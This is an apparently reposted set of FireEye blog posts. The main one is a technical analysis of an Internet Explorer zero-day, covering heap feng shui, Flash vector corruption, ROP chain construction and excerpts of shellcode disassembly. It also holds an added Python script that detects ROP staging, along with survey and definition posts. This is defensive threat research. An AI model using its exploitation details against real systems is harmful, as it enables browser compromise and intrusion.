<a href="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img2.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="img2" class="aligncenter wp-image-5362" height="328" src="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img2.png" style="border: 0px; max-width: 98%;" width="503" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<strong>Priorities misaligned in incident response</strong><br />We see the same lack of business alignment in organizations’ responses to breaches. When a breach occurs, 84 percent of those in our EMEA survey notify relevant business leaders, and 76 percent notify company executives. We often hear that companies are looking for security leaders to engage at a business level. But if business leaders and executives are still being notified about most breaches, we’re still treating security as a technical problem.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<a href="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img3.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="img3" class="aligncenter wp-image-5363" height="284" src="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img3.png" style="border: 0px; max-width: 98%;" width="469" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Our survey found a split in where security teams focus their response. About 60 percent base their response plan around all IT systems, and 40 percent focus on critical systems and resources. This response, too, suggests that organizations see many breaches as a technical problem rather than a business problem.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Along the same lines, communications, public relations, and business teams are typically far less engaged in incident responses than IT security and technical teams, executives, and HR departments. If cyber resilience is about enabling business resilience, then business teams should play an equally critical role in incident response.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
When engaging with executives, we in the security community do not seem to be taking a risk-based approach. And clearly, we are not speaking executives’ language: the impact of a breach on the company’s financial results.</div>
<div align="center" style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<em><strong>Who is included in incident response plans?</strong></em></div>
<div align="center" style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<em><strong><a href="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img4.png" style="color: #4298b5; text-decoration: none;"><img alt="img4" class="aligncenter wp-image-5364" height="380" src="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img4.png" style="border: 0px; max-width: 98%;" width="578" /></a></strong></em></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<strong>Moving toward a risk-based security framework</strong><br />Most security leaders leverage at least one security framework or standard — and in most cases, they leverage two or more. These frameworks include best practices defining what to protect, how to protect it, and how to monitor deployed controls. These features make the frameworks valuable tools to help define strategies and gauge their effectiveness. But adoption of ISO27005 — which focuses on business-risk assessment — is far behind that of ISO27001.</div>
<div align="center" style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<strong><em>Adopted security frameworks</em></strong><a href="http://www.fireeye.com/blog/wp-content/uploads/2014/04/Untitled.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="Untitled" class="aligncenter wp-image-5365" height="275" src="http://www.fireeye.com/blog/wp-content/uploads/2014/04/Untitled.png" style="border: 0px; max-width: 98%;" width="536" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<strong>Leveraging automation</strong><br />Just about every security leader would like more resources. But most of us must make the most of what we have.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
What is clear from our survey is that incident response is consuming the biggest share of time and resources.</div>
<div align="center" style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<strong><em>Security tasks that consume the most time and resources (weighted average)</em></strong><a href="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img5.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="img5" class="aligncenter wp-image-5367" height="192" src="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img5.png" style="border: 0px; max-width: 98%;" width="582" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The volume of attacks is rising. And IT systems are playing an increasingly critical role in business. So having well-defined and tested response capabilities that leverage automation would seem a key component to cyber resilience.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<strong>Bolstering cyber resilience</strong><br />Cyber security is, and will remain, an evolution. Everyone is on their own journey along the maturity curve. Security leaders must evaluate their place along that curve based on their perceptions of risks and the controls they need to put in place.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Cyber resilience recognizes that prevention is only part of the solution. Organizations must realize the following:</div>
<ul style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 16.003000259399414px; margin: 0px; padding: 0px;">
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Businesses will increasingly measure security leaders not just on what they stop or let through, but on how they respond to what does get through.</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">A breach can happen in seconds, yet the exfiltration takes hours or days and can last for months.<a href="http://www.fireeye.com/blog/corporate/2014/04/the-road-to-resilience-how-cybersecurity-is-moving-from-the-back-office-to-the-boardroom.html#_ftn1" style="color: #4298b5; font-weight: bold; text-decoration: none;" title="">[1]</a></li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">When it comes to measuring business impact, not all breaches are equal.</li>
</ul>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
At the same time, organizations must retool their strategies to better discover and respond to security incidents. This shift requires:</div>
<ul style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 16.003000259399414px; margin: 0px; padding: 0px;">
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Having a documented, regularly reviewed, and well-tested cyber response strategy that includes both the business and technical response plans.</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Reducing the time and costs involved in response.</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Being able to qualify the business risk of the incident. By better aligning cyber strategies to business drivers and business risk, security leaders can have a bigger business impact and increase their relevance to executives.</li>
</ul>
<span style="color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: x-small;"><span style="line-height: 18.200000762939453px;"><a href="http://www.fireeye.com/blog/corporate/2014/04/the-road-to-resilience-how-cybersecurity-is-moving-from-the-back-office-to-the-boardroom.html" target="_blank">http://www.fireeye.com/blog/corporate/2014/04/the-road-to-resilience-how-cybersecurity-is-moving-from-the-back-office-to-the-boardroom.html</a></span></span>Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-31382064008064699802014-04-28T21:26:00.000-07:002014-04-28T21:26:15.121-07:00[fireeye] New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<span style="color: black; font-weight: bold;">Summary</span></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
FireEye Research Labs identified a new Internet Explorer (IE) zero-day exploit used in targeted attacks. The vulnerability affects IE6 through IE11, but the attack is targeting IE9 through IE11. This zero-day bypasses both ASLR and DEP. Microsoft has assigned CVE-2014-1776 to the vulnerability and released a <a href="https://technet.microsoft.com/en-US/library/security/2963983" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">security advisory</a> to track this issue.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Threat actors are actively using this exploit in an ongoing campaign which we have named “Operation Clandestine Fox.” However, for many reasons, we will not provide campaign details. But we believe this is a significant zero-day, as the vulnerable versions represent about a quarter of the total browser market. We recommend applying a patch once available.<br />According to <a href="http://www.netmarketshare.com/browser-market-share.aspx?qprid=2&qpcustomd=0&qpsp=168&qpnp=12&qptimeframe=M" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">NetMarket Share</a>, the market share for the targeted versions of IE in 2013 was:</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
IE 9 13.9%<br />IE 10 11.04%<br />IE 11 1.32%</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Collectively, in 2013, the vulnerable versions of IE accounted for 26.25% of the browser market. The vulnerability, however, does appear in IE6 through IE11 though the exploit targets IE9 and higher.</div>
<h2 style="background-color: white; color: #c8102e; font-family: arial, helvetica, clean, sans-serif; font-size: 18px; font-weight: normal; margin: 0px 0px 10px; padding: 0px 0px 4px;">
The Details</h2>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The exploit leverages a previously unknown use-after-free vulnerability, and uses a well-known <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2013/10/aslr-bypass-apocalypse-in-lately-zero-day-exploits.html" style="color: #4298b5; font-weight: bold; text-decoration: none;">Flash exploitation technique</a> to achieve arbitrary memory access and bypass Windows’ ASLR and DEP protections.</div>
<h2 style="background-color: white; color: #c8102e; font-family: arial, helvetica, clean, sans-serif; font-size: 18px; font-weight: normal; margin: 0px 0px 10px; padding: 0px 0px 4px;">
Exploitation</h2>
<h3 style="background-color: white; color: #1d252d; font-family: arial, helvetica, clean, sans-serif; font-size: 16px; font-weight: normal; margin: 0px 0px 10px; padding: 0px;">
• Preparing the heap</h3>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The exploit page loads a Flash SWF file to manipulate the heap layout with the common technique <a href="http://en.wikipedia.org/wiki/Heap_feng_shui" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">heap feng shui</a>. It allocates Flash vector objects to spray memory and cover address <em>0x18184000</em>. Next, it allocates a vector object that contains a <em>flash.Media.Sound()</em> object, which it later corrupts to pivot control to its ROP chain.</div>
<h3 style="background-color: white; color: #1d252d; font-family: arial, helvetica, clean, sans-serif; font-size: 16px; font-weight: normal; margin: 0px 0px 10px; padding: 0px;">
• Arbitrary memory access</h3>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The SWF file calls back to JavaScript in IE to trigger the IE bug and overwrite the length field of a Flash vector object in the heap spray. The SWF file loops through the heap spray to find the corrupted vector object, and uses it to modify the length of a second vector object. This second corrupted vector object is then used for all subsequent memory accesses, which in turn are used to bypass ASLR and DEP.</div>
<h3 style="background-color: white; color: #1d252d; font-family: arial, helvetica, clean, sans-serif; font-size: 16px; font-weight: normal; margin: 0px 0px 10px; padding: 0px;">
• Runtime ROP generation</h3>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
With full memory control, the exploit searches NTDLL for <em>ZwProtectVirtualMemory</em> and for a stack pivot gadget (opcode bytes 0x94 0xc3). It also searches for <em>SetThreadContext</em> in kernel32, which is used to clear the debug registers. This technique, documented <a href="http://piotrbania.com/all/articles/anti_emet_eaf.txt" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">here</a>, may be an attempt to bypass protections that use hardware breakpoints, such as EMET’s EAF mitigation.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
With the addresses of the aforementioned APIs and gadget, the SWF file constructs a ROP chain and prepends it to its RC4-decrypted shellcode. It then replaces the vftable of a sound object with a fake one that points to the newly created ROP payload. When the sound object attempts to call into its vftable, it instead pivots control to the attacker’s ROP chain.</div>
<h3 style="background-color: white; color: #1d252d; font-family: arial, helvetica, clean, sans-serif; font-size: 16px; font-weight: normal; margin: 0px 0px 10px; padding: 0px;">
• ROP and Shellcode</h3>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The ROP payload makes the memory at <em>0x18184000</em> executable and then returns to <em>0x1818411c</em> to execute the shellcode.</div>
<pre style="background-color: white; color: #5b6770; font-size: 13px; line-height: 13px; padding: 0px;">0:008> dds eax
18184100 770b5f58 ntdll!ZwProtectVirtualMemory
18184104 1818411c
18184108 ffffffff
1818410c 181840e8
18184110 181840ec
18184114 00000040
18184118 181840e4</pre>
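<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
As an added analysis example (not part of the FireEye post), the following Python decodes the <em>dds eax</em> dump above into the NtProtectVirtualMemory call frame the ROP chain builds, and applies a defender's triage heuristic: a protection change that makes a region executable while the return address sits inside that same region. The memory behind the pointer arguments is not shown on the page, so the base address (taken from the prose) and a placeholder region size are assumptions.</div>

```python
"""Decode the WinDbg `dds eax` dump from the post into the NtProtectVirtualMemory
call frame set up by the ROP chain, then apply a defender's heuristic: a call that
makes memory executable and whose return address lies inside that very region is a
strong indicator of ROP-staged shellcode."""
import re

# The dump exactly as printed in the post (seven dwords starting at 18184100).
DDS_DUMP = """\
0:008> dds eax
18184100 770b5f58 ntdll!ZwProtectVirtualMemory
18184104 1818411c
18184108 ffffffff
1818410c 181840e8
18184110 181840ec
18184114 00000040
18184118 181840e4
"""

# What the pointer arguments point to is not shown in the post. These values are
# ASSUMED for the demonstration: the base comes from the prose (0x18184000), the
# region size is a placeholder, and OldProtect is an output slot.
ASSUMED_MEMORY = {
    0x181840E8: 0x18184000,  # *BaseAddress  (from the post's prose)
    0x181840EC: 0x1000,      # *RegionSize   (placeholder, not on the page)
    0x181840E4: 0x0,         # *OldProtect   (written by the kernel)
}

# Documented Win32 page-protection constants.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_BITS = 0x10 | 0x20 | 0x40 | 0x80
CURRENT_PROCESS = 0xFFFFFFFF  # NtCurrentProcess() pseudo-handle (-1)

# NtProtectVirtualMemory(ProcessHandle, *BaseAddress, *RegionSize, NewProtect, *OldProtect)
ARG_NAMES = ("ProcessHandle", "BaseAddress", "RegionSize", "NewProtect", "OldProtect")
DDS_LINE = re.compile(r"^([0-9a-fA-F]{8})\s+([0-9a-fA-F]{8})(?:\s+(\S.*))?$")


def parse_dds(dump):
    """Parse `dds` output into (address, value, symbol-or-None) tuples; prompt lines are skipped."""
    rows = []
    for line in dump.splitlines():
        m = DDS_LINE.match(line.strip())
        if m:
            rows.append((int(m.group(1), 16), int(m.group(2), 16), m.group(3)))
    return rows


def decode_frame(rows, memory):
    """Interpret dword 0 as the target API, dword 1 as the return address, and the
    next five dwords as NtProtectVirtualMemory's stdcall stack arguments."""
    if len(rows) < 2 + len(ARG_NAMES):
        raise ValueError("dump too short for a NtProtectVirtualMemory frame")
    _, api_addr, api_sym = rows[0]
    _, ret_addr, _ = rows[1]
    args = {name: rows[2 + i][1] for i, name in enumerate(ARG_NAMES)}
    return {
        "api": api_sym or "0x%08x" % api_addr,
        "return_address": ret_addr,
        "args": args,
        "new_protect_name": PAGE_PROTECT.get(args["NewProtect"], "UNKNOWN"),
        # Dereference the in/out pointers through the (assumed) memory image.
        "base": memory.get(args["BaseAddress"]),
        "size": memory.get(args["RegionSize"]),
    }


def rop_indicators(frame):
    """Return the heuristics that fire for a decoded frame (empty list = looks benign)."""
    hits = []
    if not frame["api"].endswith("ProtectVirtualMemory"):
        return hits
    args = frame["args"]
    if args["ProcessHandle"] == CURRENT_PROCESS and args["NewProtect"] & EXECUTE_BITS:
        hits.append("makes memory executable in the current process")
    if frame["base"] is not None and frame["size"] is not None:
        if frame["base"] <= frame["return_address"] < frame["base"] + frame["size"]:
            hits.append("return address lies inside the region being made executable")
    return hits


if __name__ == "__main__":
    frame = decode_frame(parse_dds(DDS_DUMP), ASSUMED_MEMORY)
    print(frame["api"], frame["new_protect_name"], hex(frame["return_address"]))
    for hit in rop_indicators(frame):
        print("INDICATOR:", hit)
```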
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
At its start, the shellcode saves the current stack pointer to <em>0x18181800</em> so that it can later return safely to the caller.</div>
<pre style="background-color: white; color: #5b6770; font-size: 13px; line-height: 13px; padding: 0px;">mov dword ptr ds:[18181800h],ebp</pre>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Then, it restores the flash.Media.Sound vftable and repairs the corrupted vector object to avoid application crashes.</div>
<pre style="background-color: white; color: #5b6770; font-size: 13px; line-height: 13px; padding: 0px;">18184123 b820609f06 mov eax,69F6020h
18184128 90 nop
18184129 90 nop
1818412a c700c0f22169 mov dword ptr [eax],offset Flash32_11_7_700_261!AdobeCPGetAPI+0x42ac00 (6921f2c0)
18184133 b800401818 mov eax,18184000h
18184138 90 nop
18184139 90 nop
1818413a c700fe030000 mov dword ptr [eax],3FEh ds:0023:18184000=3ffffff0</pre>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The shellcode also restores the ESP register to make sure the stack pointer lies within the current thread’s stack base/limit range.</div>
<pre style="background-color: white; color: #5b6770; font-size: 13px; line-height: 13px; padding: 0px;">18184140 8be5 mov esp,ebp
18184142 83ec2c sub esp,2Ch
18184145 90 nop
18184146 eb2c jmp 18184174</pre>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The shellcode calls SetThreadContext to clear the debug registers. It is possible that this is an attempt to bypass mitigations that use the debug registers.</div>
<pre style="background-color: white; color: #5b6770; font-size: 13px; line-height: 13px; padding: 0px;">18184174 57 push edi
18184175 81ece0050000 sub esp,5E0h
1818417b c7042410000100 mov dword ptr [esp],10010h
18184182 8d7c2404 lea edi,[esp+4]
18184186 b9dc050000 mov ecx,5DCh
1818418b 33c0 xor eax,eax
1818418d f3aa rep stos byte ptr es:[edi]
1818418f 54 push esp
18184190 6afe push 0FFFFFFFEh
18184192 b8b308b476 mov eax,offset kernel32!SetThreadContext (76b408b3)
18184197 ffd0 call eax</pre>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The shellcode calls <em>URLDownloadToCacheFileA </em>to download the next stage of the payload, disguised as an image.</div>
<h2 style="background-color: white; color: #c8102e; font-family: arial, helvetica, clean, sans-serif; font-size: 18px; font-weight: normal; margin: 0px 0px 10px; padding: 0px 0px 4px;">
Mitigation</h2>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Using EMET may break the exploit in your environment and prevent it from successfully controlling your computer. <strong>EMET versions 4.1 and 5.0 break (and/or detect) the exploit in our tests.</strong><br /><strong>Enhanced Protected Mode in IE breaks the exploit in our tests.</strong> EPM was introduced in IE10.<br />Additionally, the attack will not work without Adobe Flash. <strong>Disabling the Flash plugin within IE will prevent the exploit from functioning.</strong></div>
<h2 style="background-color: white; color: #c8102e; font-family: arial, helvetica, clean, sans-serif; font-size: 18px; font-weight: normal; margin: 0px 0px 10px; padding: 0px 0px 4px;">
Threat Group History</h2>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The APT group responsible for this exploit has in the past been the first group to have access to a select number of browser-based 0-day exploits (e.g. IE, Firefox, and Flash). They are extremely proficient at lateral movement and are difficult to track, as they typically do not reuse command and control infrastructure. They have a number of backdoors, including one known as Pirpi that we previously discussed <a href="http://www.fireeye.com/blog/technical/botnet-activities-research/2010/11/ie-0-day-hupigon-joins-the-party.html" style="color: #4298b5; font-weight: bold; text-decoration: none;">here</a>. CVE-2010-3962, then a 0-day exploit in Internet Explorer 6, 7, and 8, dropped the Pirpi payload discussed in that earlier case.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
As this is still an active investigation we are not releasing further indicators about the exploit at this time.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<a href="http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html" target="_blank">http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-48640550954459192842014-04-28T21:24:00.003-07:002014-04-28T21:24:44.012-07:00[fireeye] Zero-Day Attacks are not the same as Zero-Day Vulnerabilities<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
When it comes to “zero-days,” there is much room for confusion in terms of definition and priority. At FireEye, we follow the industry-standard term of “zero-day attacks.”<strong> This term is defined as software or hardware vulnerabilities that have been exploited</strong> by an attacker where there is <strong>no prior knowledge of the flaw in the general information security community</strong>, and, therefore, no vendor fix or software patch available for it.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Here is the <a href="http://en.wikipedia.org/wiki/Zero-day_attack" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">Wikipedia definition</a>:</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<i>“A <b>zero-day</b> (or <b>zero-hour</b> or <b>day zero</b>) <b>attack</b> or </i><a href="http://en.wikipedia.org/wiki/Threat_(computer)" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank" title="Threat (computer)"><b><i>threat</i></b></a><i> is an </i><a href="http://en.wikipedia.org/wiki/Attack_(computing)" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank" title="Attack (computing)"><i>attack</i></a><i> that exploits a previously unknown </i><a href="http://en.wikipedia.org/wiki/Vulnerability_(computing)" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank" title="Vulnerability (computing)"><i>vulnerability</i></a><i> in a </i><a href="http://en.wikipedia.org/wiki/Application_software" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank" title="Application software"><i>computer application</i></a><i>, one that developers have not had time to address and patch.</i><a href="http://en.wikipedia.org/wiki/Zero-day_attack#cite_note-1" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank"><i><span style="font-size: 12px; position: relative; top: -0.4em; vertical-align: text-top;">[1]</span></i></a><i> There are zero days between the time the vulnerability is discovered (and made public), and the first attack.”</i></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Many security researchers identify vulnerabilities – some as a byproduct of attack detection and others as a core focus. With the exception of vulnerabilities identified by black hat hackers for use in attacks, nearly all vulnerabilities are responsibly, and confidentially, sent to the party responsible for the creation of the software so that fixes can be made. These can range from critical holes like those we found exploited in globally popular software like Internet Explorer to the never-exploited ones in rarely used applications.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
FireEye has demonstrated unparalleled capabilities finding zero-day exploits that are “<b>in the wild,</b>” meaning the vulnerability is being used by criminals and threat actors for malicious purposes. In 2013, FireEye discovered <b>11</b> zero-day exploits that were actively in use by advanced threat actors and has already discovered an additional <b>two</b> in 2014. Zero-day exploits already in use by APT actors represent the most critical cyber threat to the CISOs of organizations. Even if APT actors do not target an organization, other criminal exploit authors will often reverse the zero-day exploit and create their own version before patches can be released.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
At FireEye, we examine data from over 2 million virtual machines located in every corner of the globe, resulting in near instantaneous threat intelligence and threat metrics being captured in our Dynamic Threat Intelligence™ (DTI) cloud. This intelligence allows us to evaluate the entire attack life cycle, or “kill chain,” of an attack and view the behaviors of the attacker. FireEye examines all of the tools, tactics and procedures (TTPs) used by attackers to create an initial compromise, establish a foothold, escalate privileges, conduct internal reconnaissance, move laterally, maintain persistence, and finally complete their mission.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<a href="http://www.fireeye.com/blog/wp-content/uploads/2014/04/Killchain.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="Killchain" class="aligncenter size-full wp-image-5298" height="330" src="http://www.fireeye.com/blog/wp-content/uploads/2014/04/Killchain.png" style="border: 0px; max-width: 98%;" width="900" /></a></div>
<div align="center" style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Figure 1. The attack lifecycle</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Our focus is to create a holistic view of security at every step in the attack lifecycle, in which the identification of zero-day exploits used by malicious actors is one component. We also contribute back to the security research community by sharing detailed, comprehensive views of attack lifecycles, for example in <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html" style="color: #4298b5; font-weight: bold; text-decoration: none;">Operation Ephemeral Hydra</a>. At FireEye, our defense strategy encompasses all malicious activities you may find on your network or on your endpoints, including those that leverage zero-day vulnerabilities and those that do not.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<a href="http://www.fireeye.com/blog/corporate/2014/04/zero-day-attacks-are-not-the-same-as-zero-day-vulnerabilities.html" target="_blank">http://www.fireeye.com/blog/corporate/2014/04/zero-day-attacks-are-not-the-same-as-zero-day-vulnerabilities.html</a></div>
